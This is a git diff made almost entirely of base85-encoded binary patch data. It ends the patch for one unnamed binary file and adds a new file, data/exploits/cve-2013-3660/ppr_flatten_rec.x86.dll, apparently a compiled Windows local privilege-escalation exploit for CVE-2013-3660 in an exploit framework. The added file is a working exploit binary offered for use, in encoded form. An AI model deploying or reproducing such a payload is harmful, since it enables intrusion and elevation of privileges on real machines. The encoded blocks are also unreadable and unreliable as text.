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%0A8lLb
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
Cxd2oE

diff --git a/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll b/data/exploits/cve-2013-3660/ppr_flatten_rec.x86.dll
new file mode 100755
index 0000000000000000000000000000000000000000..888d31339a3e3e318188c671ad779ef9954b3df6
GIT binary patch
literal 72192
zcmeFae_&L_xi@|`yPGV@hFv6qAVGo#OO4v-f)bZ#0@)-YfsG-XL=509q}wf38qVRz
zl|bUjYEH(r^j^8Oz4lfby|1m_mRl7Ne`N_K0TF|6H44?JR3|LeC^T6h=6pZToZS$#
zx9|Jk_x^FwJu~ynuV<c_dFGjCo|%;0wM{Zhl4QY8*ClBWT>4iazJLGIhv@Os_l}pI
zANS^rJ*Gu(&RFXI;kvA~_4oat{+=IaegB?&@4ZjX`iIq7^~$|jKfE`qXh}uZkMCQx
z`ufz=<m_0{|9buKdmk?Or`GuI7gwxn?Lzn$SCqBBCEWVfy>Q>T+0@!A(*1Mm190D-
zR^R%8a2LniMZ&%Fhu`;8S#iw09!XkcvPj<U?RUmueNw`V6q8+&o(05DEtjMlr{d$p
zuN^<~kv~C_tRiU8M|g7qL6)?CF;TQhWTLc`LAZvKWim<20d0iq6&e4VPnK2kr~Wr_
zW57GV{zjj)OHvVP|L^`?FR$JxBl4!-;X`;)TaBi|WBkjKq`vFxSKTAugXmJg+VNY6
z-%k9-{3}4!*Bi;CMh6OUqT<Vt;QW|G@FHFN_4TXQ-1mKumD+^1N#o(#FGUpT<^%e_
z|NaM1ppu<t9!qTpT=jIWtG&WkrFl+jo<7ZUTJxOHJe<F$>pC0QQ+Agm)#W8BlUeb+
zP-%P9x!1rqHjHbUmrHX@HZP8xShXV;P12O%E>908ht%acMm^68?5sLXs~rd)cQo$=
zgjLLP9dPWvKf5&{d?0n+J&s-N^=38PXYOw5A|^DyE~qP?G@V=a^1^^4_!bp$zq88|
zrSZ#3=CPu=8_ivsr<bkGVg=deAqt#jy==VsE!W$vrtra3$E)q;p2AjBbG!0o)A>gh
zk3TJEG@bw5aO!5+*>ryC!9V;=wl$sq>c+wGN-gvBI(Db9g3OSm#oT42R>m=jN<A65
z!N?W|^hL6a{BgkPh$B`|l97coPt;1S&^*zI8G%4TjoN83zgHJ*cLb|J%*d9ebG82S
z^OQ}j!pY{NJ<g5hebgSMmsN`<y-(q@uJ!^H!cxo!T{@cemS|Qq-Yk7j@}df52J@VC
z?6$FDLZ4Zjl<~yhK*3aYR_(9=2jvf}c0g@7DajdXL!TsHrZ$|GWV_nHB{@-TI3X#i
zY^u>&!HN-dy)w*}&kGcoKk!TFUc~6@ya7qCJPnsctF(r*dL?HSOWEPz+wx_sE2op1
